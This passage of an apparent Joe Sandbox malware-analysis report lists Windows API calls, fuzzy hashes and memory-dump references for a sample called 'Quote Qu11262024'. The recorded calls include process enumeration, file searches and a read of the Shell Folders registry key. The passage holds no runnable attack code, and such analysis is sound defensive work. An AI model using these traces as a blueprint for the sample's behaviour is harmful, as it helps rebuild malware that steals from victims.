                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859505661-0
                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                    APIs
                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumNamesResource
                                                                                                    • String ID:
                                                                                                    • API String ID: 3334572018-0
                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                    • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3655998216-0
                                                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1828521557-0
                                                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 609303285-0
                                                                                                    • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                    • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2136311172-0
                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@
                                                                                                    • String ID:
